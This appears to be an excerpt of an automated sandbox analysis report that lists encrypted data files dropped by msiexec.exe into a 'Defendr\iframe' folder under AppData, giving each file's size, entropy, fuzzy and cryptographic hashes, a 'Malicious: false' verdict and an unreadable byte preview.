Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv35.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33097
Entropy (8bit):	7.994609982490262
Encrypted:	true
SSDEEP:	768:BW6NOh3fCcFSodnPvIsFLBhTWFVrXRRDtlBwyHyWqQ:BW6EhvCgtdHBPEVXjHyWqQ
MD5:	B885A0966AF37D3A1C28EB16B505A751
SHA1:	B51E6526C987935FBDE80CE039FDDC3E0460AB2A
SHA-256:	6A9A038A54D95860E3011F93391DBEC99FCCED9ED7A1A6615F5F8A1FE50A3157
SHA-512:	68F2896F74D6DCF3DE4A6BC13B9F378E2428B26907AF14D5B99CE335F52835B01B97A56160A81D8725D0F023057D1F5E4CE0BD8DF0816E0F38D2510B09687B8E
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv36.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	102051
Entropy (8bit):	7.998156418187762
Encrypted:	true
SSDEEP:	3072:ogGkjn/WTIWJEKAYvZfd9DSPToJuewpv9e:ECKIWJLBbSLswpvM
MD5:	95A6D0ED38A760F66FB112A5DE59A007
SHA1:	B8ED6F61A7C517CD823F6D5CE0E9217967BEF890
SHA-256:	1917C0F40A87CAD58D49123CE2C7626943504C0F1B3FB8A4826958DE2FD9CBEF
SHA-512:	C0741E8EFA86F4432817CE679CBBD7A74EE7D67891E5FE23826A8AF8E114C911854480E9762FD937D0E4DEBD4CF82E33B2F19A7DCCC0F9128B6A9DEF8AAC4D6C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv36.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	34219
Entropy (8bit):	7.995028541539741
Encrypted:	true
SSDEEP:	768:BW6Na79PrmgozVd79x9H4l22VjNHVda4G:BW6W9Dfohd79kl22n1PG
MD5:	946B26FFB476A97FE2151D1EBC46CB15
SHA1:	7C9E829F00161D1C314FFD35AD56C87788102DA2
SHA-256:	9593E3D3D284E900189B6F8E5E473B0CC83C817D7E58C649E10AE9672B005E36
SHA-512:	D0F5FAA8FB7AC11B6C0C5F5599D991B8073DE7B314D48903C3536EDFCB0B73C4241A121A8F47DF6C67F23EBF63918418AEF945F5C17F99231B82B5026C60F43C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv37.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	102368
Entropy (8bit):	7.998287814737377
Encrypted:	true
SSDEEP:	1536:BW697ZjN7E9eeTnfPLqxi1p7/p0A50FjiSyvNeLweTOv8rWEFhCtRthTkJ:o27NNQkQHLqg1N+rFt5OEaEFSTY
MD5:	27F06D436A9F1D9CFE5331BB820C5886
SHA1:	E1E7C6A9DB93EB16537CA3E55FBFF36AA03F6837
SHA-256:	871C8926B79A0BAE43A035E00C030AE79713A6B2B15116D25A9D0DD967D433FB
SHA-512:	7CE1F14E46ABD85210DF7E3AD957542532AD22A77E3B5D111EDE0C6B8912A94A0845E52E37BA2206B4816054AE824DCFE9438E212CFBB37B4C1955EA5B7DC72D
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv37.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	34956
Entropy (8bit):	7.99390210191762
Encrypted:	true
SSDEEP:	768:BW6N+314uNtmdalgFjuCUoMZ5Lp2idgAAuY5moUl6fKL:BW6sWuNplg1uHjXHAuYkl6fKL
MD5:	59277C66CA0C3F137749B2F0CB6E5C10
SHA1:	7EBA4A7CC9AFCCF75DE58D365749295A8969CD42
SHA-256:	5F98CE2635A33388E7E3D7793873D6304AD31BBB7D33362999D418E1297515AE
SHA-512:	F127BFF4423F9D072D29E35D2C3CB0587D777ACEC9DB16ED1B762D4B972755DD7D9FBC737F6D0A9369EC033F76DE3F4B9C5D23890C98D102CC86F6D4DC3C739A
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv38.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100625
Entropy (8bit):	7.998258836304681
Encrypted:	true
SSDEEP:	3072:ojxobAh8Z/SFNO6swJ21ekvIhdmeDRjqcTb5NB:yCTZ/4NO8Q1e+Ih7xqcPl
MD5:	C607F49179483B4A4FC6D510E225E5A7
SHA1:	424BF0A62051C28C3E3872E5F78320E2F66E8F29
SHA-256:	E00BCDDC005391C50994D8C32487BD8218CAAF3D1D05CC6925BF810A240EC852
SHA-512:	6A6A907DFC581C92B205781CAA9D7788506BCF66103A790159546D06E00E9EE3DC3512E8F8D6370577D781AB7C13A106896EB39238D302CE3830E47A43A39C6C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv38.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33039
Entropy (8bit):	7.994125857127421
Encrypted:	true
SSDEEP:	768:BW6NDBqY1ZYCXu5bgCU/IIynDlmDPOxeUXjWx:BW6p1Z7u5bJsIXokjWx
MD5:	341724703E215BD6C8B1CC913B43C760
SHA1:	A348E7BEC48CC02A89C81B96ADDB5F72547BAD1C
SHA-256:	21F9220D1393695A01ED52B0BA713832AB84686ED71AEEFA5576ACB04FE961E4
SHA-512:	BD6A8E7AC01FDF7B3EE41E624AD5F5569ABC41B77EB83381A8E4082C222BB5F5433F60A8CB33898DE3E029BBB6812610369D9C118AB0CE1C012DCF97D31A8737
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv39.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	98042
Entropy (8bit):	7.998232771168422
Encrypted:	true
SSDEEP:	1536:BW6XQPIX4GVmnGevnpNxj/tvYWvOfaYTm0ZjWZVwkss/k3/9Okm+DJqziTGt4jzH:oNUVmnGev9tvYW1pUWXwkxyN96mRlNzp
MD5:	5FF15A57BC129B5997E1ED33B59FD859
SHA1:	D9748C94D6986C5914C7ABAF7F941234ACFE3657
SHA-256:	EA50E8F3C7A99AE4A918A9E123F598056877022BBD2A9952538FC11D917C7D9B
SHA-512:	6D124768092CC59ABE911C60A1E17CAF7876C0B449318A912EB892CAD1E3A267E33B03C812D135F56D514D041DC7D3E0780DE5FB46285C386518B057901B64DE
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv39.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	30982
Entropy (8bit):	7.9936602257846285
Encrypted:	true
SSDEEP:	768:BW6Nw89x7jFGYusgi9XnetODMhBs1PWsGef2/1X1PCr5n:BW6F9x3TuGk01PWsGpl1PCr5n
MD5:	06A392C6ED644F5EB544528F0F943CAF
SHA1:	F355C8E5D3FC6A45E451EA716F576DA2DF8C585C
SHA-256:	C6979DD2F845F6CBED19FD786A169D1B7E0F2B769912A0E7F31076870559C499
SHA-512:	5B205F29E9ED454018621B3D95031B7A27B3D807A4556F4561BA2A8A6268505FD3280EF109DB44CF4005D3C2DD1DC64393540975451DC45944C3230F459B635E
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv4.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	100840
Entropy (8bit):	7.998100994292755
Encrypted:	true
SSDEEP:	1536:BW6O+IYxyqQ9b0WMBCWjOsRFv8NCbY6aGtgVxkpLDZBDYbSm9gFnq+Tahj6rru:oAgMsWjD5FbYRLkpfnDY2VqRhj1
MD5:	69233711359E955EF620804A89773A01
SHA1:	31BDFA90CAF80D82C6ED0AD96F5AEC3E76894438
SHA-256:	4F2D662F51F476511B875EEA8D545B3B398D5D636955565EA7582A5170AE5942
SHA-512:	D625A81C8B2CA91366276BDB60CF9EFB291AFCF10105BB1950605E0BE284E2A09CBDE283CE5CFF1C5D889BCD2B0C8E20CA1A9D205E9B11D0762C38F5CF0C339C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv4.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	33061
Entropy (8bit):	7.994303843711856
Encrypted:	true
SSDEEP:	768:BW6NC4JFpvJfPSG1OCkkF749AgxhDGLKVUNqr6W:BW6XjTfF1AkF7cDGL126W
MD5:	85FA11E8E404ACB68CC0E94112DE4EAC
SHA1:	9726564F9B236EFE6A97647AAE5CD33D221780A7
SHA-256:	4B889FDB958AF334996955C1D16CD0E8C2D8CA32B0D7E6C1D48CB7F88C74E503
SHA-512:	0F3B1B2BBD8E6CD60F1B6923192AC3AB5BEEE5FE044827D929BBF0A32AE3AE46160A73EE572878AF84178096C947D3D779DCE7ED92DF2DD0A1F490B68FF7807B
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv40.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	101881
Entropy (8bit):	7.99851186478424
Encrypted:	true
SSDEEP:	1536:BW694jBnxeUrwTeoxi51T2o/IgODbDnexQOH1mehLxun3wbfwRFsWW1BL/tzyoL2:oD8ThZ6IgUbqxQODxu3wb3/zzErP
MD5:	5650BB8A3AFB95778C068056EA82F1AF
SHA1:	3862B30011875537FD471AD3EEC60436E151B8F4
SHA-256:	3D6BCABE68EE6DD6CF5B1CB75674C71A4AD44EA1DF2EEF5B9247E6832367F104
SHA-512:	EAC304C3775604D0369336750F343CA2292F348FA9FDBEC3D80610D609DE0795668A9235223F70FCD46E8D6BC59CB8C0EB5762ECE3AFC08F7B867B0686AF28F1
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv40.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	36152
Entropy (8bit):	7.994665199756768
Encrypted:	true
SSDEEP:	768:BW6NyS+X3jDMzxYUUo1o6ySohxIl1RUY91xOpcSsUPrJmMWLjlQmmwB:BW6MJXvOxY/o1h7ohGlTUdpfserk9hQs
MD5:	136E5B4E8CC6E1A10CD31A82271FD432
SHA1:	CC75803F4A294AA7E5043C924C5564E11BDB01A1
SHA-256:	541A4CB4AC89DC976197A2A355237633E615DEE30A717C1F822FB0387BB998F0
SHA-512:	CED73B5453D8A73FB9EA953659A3D6D57F39843354D3E18388D2D6926B3917082F98C8573B32C58D1F6040B0E9E6BB791F7A5C21C0BE85D6CD579F51205F8461
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv41.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	106388
Entropy (8bit):	7.998355984294275
Encrypted:	true
SSDEEP:	3072:oeXeOmEBIb9CWErJZcZGYL3DRg6egHEBKC/K1:Gu49CWE9OZG0SNgk/0
MD5:	EE38E0CD908F86BB34C79806EF14B1EB
SHA1:	09AE883AC80691697BA410143814877F174C5DCF
SHA-256:	2F062581D9EC9D7ABFE8661AC22B933AFC54BE7389C61C5DF0DD96046BF83497
SHA-512:	8A854C366554381F645FBC75EC7E7D7D2E647F949738B1C8B67C3DC05BDCBED46E26AB9D76F30F56DBCDAA523C090338A10E6DCEBA9158B5F281885C5FF1DA4B
Malicious:	false
